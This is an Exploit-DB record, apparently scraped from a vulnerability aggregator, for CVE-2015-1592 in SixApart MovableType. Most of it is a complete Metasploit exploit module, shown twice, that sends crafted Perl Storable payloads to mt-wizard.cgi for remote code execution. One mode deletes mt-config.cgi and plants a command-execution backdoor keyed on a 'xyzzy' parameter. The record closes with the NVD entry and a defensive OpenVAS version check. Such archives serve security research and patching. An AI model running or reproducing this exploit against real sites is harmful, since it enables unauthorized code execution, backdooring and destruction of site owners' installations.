ID EDB-ID:41697 Type exploitdb Reporter Exploit-DB Modified 2015-02-11T00:00:00
Description
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit). CVE-2015-1592. Webapps exploit for Linux platform
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'SixApart MovableType Storable Perl Code Execution',
'Description' => %q{
This module exploits a serialization flaw in MovableType before 5.2.12 to execute
arbitrary code. The default nondestructive mode depends on the target server having
the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
The destructive mode of operation uses only required MovableType dependencies,
but it will noticeably corrupt the MovableType installation.
},
'Author' =>
[
'John Lightsey',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-1592' ],
[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'BadChars' => ' ',
'Space' => 1024,
},
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Feb 11 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
], self.class
)
end
=begin
#!/usr/bin/perl
# generate config parameters for injection checks
use Storable;
{
package XXXCHECKXXX;
sub STORABLE_thaw {
return 1;
}
sub STORABLE_freeze {
return 1;
}
}
my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";
{
package DateTime;
use overload '+' => sub { 'ignored' };
}
=end
def check
vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
}
})
unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
vprint_status("Failed XXXCHECKXXX.pm load test");
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def exploit
if datastore['DESTRUCTIVE']
exploit_destructive
else
exploit_nondestructive
end
end
=begin
#!/usr/bin/perl
# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
use Storable;
{
package Object::MultiType;
use overload '+' => sub { 'ingored' };
}
{
package Object::MultiType::Saver;
}
{
package DateTime;
use overload '+' => sub { 'ingored' };
}
{
package Try::Tiny::ScopeGuard;
}
my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
=end
def exploit_nondestructive
print_status("Using nondestructive attack method")
config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
config_payload << payload.encoded.unpack('H*')[0]
config_payload << "7d293b"
config_payload << "23" * (1025 - payload.encoded.length)
config_payload << "0a657869743b"
print_status("Sending payload (#{payload.raw.length} bytes)")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => config_payload
}
}, 5)
end
=begin
#!/usr/bin/perl
# Generate destructive config parameter to unlink mt-config.cgi
use Storable;
{
package CGITempFile;
}
my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";
my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";
=end
def exploit_destructive
print_status("Using destructive attack method")
# First we need to delete mt-config.cgi using the storable injection
print_status("Sending storable injection to unlink mt-config.cgi")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
}
})
if res && res.code == 200
print_status("Successfully sent unlink request")
else
fail_with(Failure::Unknown, "Error sending unlink request")
end
# Now we rewrite mt-config.cgi to accept a payload
print_status("Rewriting mt-config.cgi to accept the payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'next_step',
'step' => 'optional',
'default_language' => 'en_us',
'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
'set_static_uri_to' => '/',
'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
}
})
if res && res.code == 200
print_status("Successfully sent mt-config rewrite request")
else
fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
end
# Finally send the payload
print_status("Sending payload request")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
'vars_get' => {
'xyzzy' => payload.encoded,
}
}, 5)
end
end
{"id": "EDB-ID:41697", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)", "description": "SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit). CVE-2015-1592. Webapps exploit for Linux platform", "published": "2015-02-11T00:00:00", "modified": "2015-02-11T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://www.exploit-db.com/exploits/41697/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2015-1592"], "lastseen": "2017-03-23T13:16:58", "viewCount": 3, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-03-23T13:16:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1592"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/SIXAPART_MOVABLETYPE_STORABLE_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131860"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805357", "OPENVAS:1361412562310703183", "OPENVAS:703183"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3183-1:59B04"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31849", "SECURITYVULNS:VULN:14346"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3183.NASL"]}], "modified": "2017-03-23T13:16:58", "rev": 2}, "vulnersScore": 7.1}, "sourceHref": "https://www.exploit-db.com/download/41697/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SixApart MovableType Storable Perl Code Execution',\r\n 'Description' => %q{\r\n This module exploits a serialization flaw in MovableType before 5.2.12 to execute\r\n arbitrary code. The default nondestructive mode depends on the target server having\r\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\r\n The destructive mode of operation uses only required MovableType dependencies,\r\n but it will noticeably corrupt the MovableType installation.\r\n },\r\n 'Author' =>\r\n [\r\n 'John Lightsey',\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-1592' ],\r\n [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => ' ',\r\n 'Space' => 1024,\r\n },\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Automatic', {}]],\r\n 'DisclosureDate' => 'Feb 11 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),\r\n OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])\r\n ], self.class\r\n )\r\n\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# generate config parameters for injection checks\r\nuse Storable;\r\n{\r\n package XXXCHECKXXX;\r\n sub STORABLE_thaw {\r\n return 1;\r\n }\r\n sub STORABLE_freeze {\r\n return 1;\r\n }\r\n}\r\nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"LFI test for storable flaw is: $frozen\\n\";\r\n{\r\n package DateTime;\r\n use overload '+' => sub { 'ignored' };\r\n}\r\n=end\r\n\r\n def check\r\n vprint_status(\"Sending storable test injection for XXXCHECKXXX.pm load failure\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'\r\n }\r\n })\r\n\r\n unless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\")\r\n vprint_status(\"Failed XXXCHECKXXX.pm load test\");\r\n return Exploit::CheckCode::Safe\r\n end\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if datastore['DESTRUCTIVE']\r\n exploit_destructive\r\n else\r\n exploit_nondestructive\r\n end\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# Generate nondestructive config parameter for RCE via Object::MultiType\r\n# and Try::Tiny. The generated value requires minor modification to insert\r\n# the payload inside the system() call and resize the padding.\r\nuse Storable;\r\n{\r\n package Object::MultiType;\r\n use overload '+' => sub { 'ingored' };\r\n}\r\n{\r\n package Object::MultiType::Saver;\r\n}\r\n{\r\n package DateTime;\r\n use overload '+' => sub { 'ingored' };\r\n}\r\n{\r\n package Try::Tiny::ScopeGuard;\r\n}\r\nmy $try_tiny_loader = bless {}, 'DateTime';\r\nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';\r\nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType';\r\nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard';\r\nmy $data = [$try_tiny_loader, $try_tiny_executor];\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\";\r\n=end\r\n\r\n def exploit_nondestructive\r\n print_status(\"Using nondestructive attack method\")\r\n config_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\"\r\n config_payload << payload.encoded.unpack('H*')[0]\r\n config_payload << \"7d293b\"\r\n config_payload << \"23\" * (1025 - payload.encoded.length)\r\n config_payload << \"0a657869743b\"\r\n\r\n print_status(\"Sending payload (#{payload.raw.length} bytes)\")\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => config_payload\r\n }\r\n }, 5)\r\n end\r\n\r\n=begin\r\n#!/usr/bin/perl\r\n# Generate destructive config parameter to unlink mt-config.cgi\r\nuse Storable;\r\n{\r\n package CGITempFile;\r\n}\r\nmy $unlink_target = \"mt-config.cgi\";\r\nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\";\r\nmy $data = [$cgitempfile];\r\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\r\n$frozen = unpack 'H*', $frozen;\r\nprint \"RCE unlink payload requiring CGI: $frozen\\n\";\r\n=end\r\n\r\n def exploit_destructive\r\n print_status(\"Using destructive attack method\")\r\n # First we need to delete mt-config.cgi using the storable injection\r\n\r\n print_status(\"Sending storable injection to unlink mt-config.cgi\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'retry',\r\n 'step' => 'configure',\r\n 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n print_status(\"Successfully sent unlink request\")\r\n else\r\n fail_with(Failure::Unknown, \"Error sending unlink request\")\r\n end\r\n\r\n # Now we rewrite mt-config.cgi to accept a payload\r\n\r\n print_status(\"Rewriting mt-config.cgi to accept the payload\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\r\n 'vars_get' => {\r\n '__mode' => 'next_step',\r\n 'step' => 'optional',\r\n 'default_language' => 'en_us',\r\n 'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\",\r\n 'set_static_uri_to' => '/',\r\n 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n print_status(\"Successfully sent mt-config rewrite request\")\r\n else\r\n fail_with(Failure::Unknown, \"Error sending mt-config rewrite request\")\r\n end\r\n\r\n # Finally send the payload\r\n\r\n print_status(\"Sending payload request\")\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'mt.cgi'),\r\n 'vars_get' => {\r\n 'xyzzy' => payload.encoded,\r\n }\r\n }, 5)\r\n end\r\n\r\nend", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.", "edition": 10, "cvss3": {}, "published": "2015-02-19T15:59:00", "title": "CVE-2015-1592", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1592"], "modified": "2019-10-09T00:20:00", "cpe": ["cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2015-1592", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1592", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:20", "description": "", "published": "2015-05-11T00:00:00", "type": "packetstorm", "title": "SixApart MovableType Storable Perl Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1592"], "modified": "2015-05-11T00:00:00", "id": "PACKETSTORM:131860", "href": "https://packetstormsecurity.com/files/131860/SixApart-MovableType-Storable-Perl-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SixApart MovableType Storable Perl Code Execution', \n'Description' => %q{ \nThis module exploits a serialization flaw in MovableType before 5.2.12 to execute \narbitrary code. The default nondestructive mode depends on the target server having \nthe Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. \nThe destructive mode of operation uses only required MovableType dependencies, \nbut it will noticeably corrupt the MovableType installation. \n}, \n'Author' => \n[ \n'John Lightsey', \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-1592' ], \n[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'BadChars' => ' ', \n'Space' => 1024, \n}, \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => [['Automatic', {}]], \n'DisclosureDate' => 'Feb 11 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), \nOptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) \n], self.class \n) \n \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# generate config parameters for injection checks \n \nuse Storable; \n \n{ \n \npackage XXXCHECKXXX; \n \nsub STORABLE_thaw { \nreturn 1; \n} \n \nsub STORABLE_freeze { \nreturn 1; \n} \n \n} \n \nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj}); \n$frozen = unpack 'H*', $frozen; \nprint \"LFI test for storable flaw is: $frozen\\n\"; \n \n{ \npackage DateTime; \nuse overload '+' => sub { 'ignored' }; \n} \n \n=end \n \ndef check \nvprint_status(\"#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' \n} \n}) \n \nunless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\") \nvprint_status(\"#{peer} - Failed XXXCHECKXXX.pm load test\"); \nreturn Exploit::CheckCode::Safe \nend \nExploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif datastore['DESTRUCTIVE'] == true \nexploit_destructive \nelse \nexploit_nondestructive \nend \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# Generate nondestructive config parameter for RCE via Object::MultiType \n# and Try::Tiny. The generated value requires minor modification to insert \n# the payload inside the system() call and resize the padding. \n \nuse Storable; \n \n{ \npackage Object::MultiType; \nuse overload '+' => sub { 'ingored' }; \n} \n \n{ \npackage Object::MultiType::Saver; \n} \n \n{ \npackage DateTime; \nuse overload '+' => sub { 'ingored' }; \n} \n \n{ \npackage Try::Tiny::ScopeGuard; \n} \n \nmy $try_tiny_loader = bless {}, 'DateTime'; \nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; \nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType'; \nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard'; \n \nmy $data = [$try_tiny_loader, $try_tiny_executor]; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); \n$frozen = unpack 'H*', $frozen; \nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\"; \n \n=end \n \ndef exploit_nondestructive \nprint_status(\"#{peer} - Using nondestructive attack method\") \nconfig_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\" \nconfig_payload << payload.encoded.unpack('H*')[0] \nconfig_payload << \"7d293b\" \nconfig_payload << \"23\" * (1025 - payload.encoded.length) \nconfig_payload << \"0a657869743b\" \n \nprint_status(\"#{peer} - Sending payload (#{payload.raw.length} bytes)\") \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => config_payload \n} \n}, 5) \nend \n \n=begin \n \n#!/usr/bin/perl \n \n# Generate destructive config parameter to unlink mt-config.cgi \n \nuse Storable; \n \n{ \npackage CGITempFile; \n} \n \nmy $unlink_target = \"mt-config.cgi\"; \nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\"; \n \nmy $data = [$cgitempfile]; \nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); \n$frozen = unpack 'H*', $frozen; \nprint \"RCE unlink payload requiring CGI: $frozen\\n\"; \n \n=end \n \ndef exploit_destructive \nprint_status(\"#{peer} - Using destructive attack method\") \n# First we need to delete mt-config.cgi using the storable injection \n \nprint_status(\"#{peer} - Sending storable injection to unlink mt-config.cgi\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'retry', \n'step' => 'configure', \n'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' \n} \n}) \n \nif res && res.code == 200 \nprint_status(\"Successfully sent unlink request\") \nelse \nfail_with(Failure::Unknown, \"Error sending unlink request\") \nend \n \n# Now we rewrite mt-config.cgi to accept a payload \n \nprint_status(\"#{peer} - Rewriting mt-config.cgi to accept the payload\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), \n'vars_get' => { \n'__mode' => 'next_step', \n'step' => 'optional', \n'default_language' => 'en_us', \n'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\", \n'set_static_uri_to' => '/', \n'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', \n} \n}) \n \nif res && res.code == 200 \nprint_status(\"Successfully sent mt-config rewrite request\") \nelse \nfail_with(Failure::Unknown, \"Error sending mt-config rewrite request\") \nend \n \n# Finally send the payload \n \nprint_status(\"#{peer} - Sending payload request\") \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'mt.cgi'), \n'vars_get' => { \n'xyzzy' => payload.encoded, \n} \n}, 5) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131860/sixapart_movabletype_storable_exec.rb.txt"}], "openvas": [{"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1592"], "description": "The host is installed with movable type\n and is prone to arbitrary file upload vulnerability.", "modified": "2018-12-21T00:00:00", "published": "2015-04-10T00:00:00", "id": "OPENVAS:1361412562310805357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805357", "type": "openvas", "title": "Movable Type Local File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_movable_type_local_file_inclusion_vuln.nasl 12861 2018-12-21 09:53:04Z ckuersteiner $\n#\n# Movable Type Local File Inclusion Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeepednra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:sixapart:movable_type\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805357\");\n script_version(\"$Revision: 12861 $\");\n script_cve_id(\"CVE-2015-1592\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-21 10:53:04 +0100 (Fri, 21 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-10 15:04:37 +0530 (Fri, 10 Apr 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"Movable Type Local File Inclusion Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with movable type\n and is prone to arbitrary file upload vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to upload file or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to he Perl Storable::thaw\n function which allows remote attackers to include and execute arbitrary\n local Perl files and possibly execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n unauthenticated remote attacker to upload files and execute arbitrary code\n in an affected site.\");\n\n script_tag(name:\"affected\", value:\"Movable Type before 5.2.12.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Movable Type 5.2.12.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100912\");\n script_xref(name:\"URL\", value:\"https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"mt_detect.nasl\");\n script_mandatory_keys(\"movabletype/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!movVer = get_app_version(cpe:CPE, port:http_port))\n exit(0);\n\nif(version_is_less(version:movVer, test_version:\"5.2.12\")) {\n report = report_fixed_ver(installed_version: movVer, fixed_version: \"5.2.12\");\n security_message(data:report, port:http_port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:52:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. The Common Vulnerabilities and\nExposures project 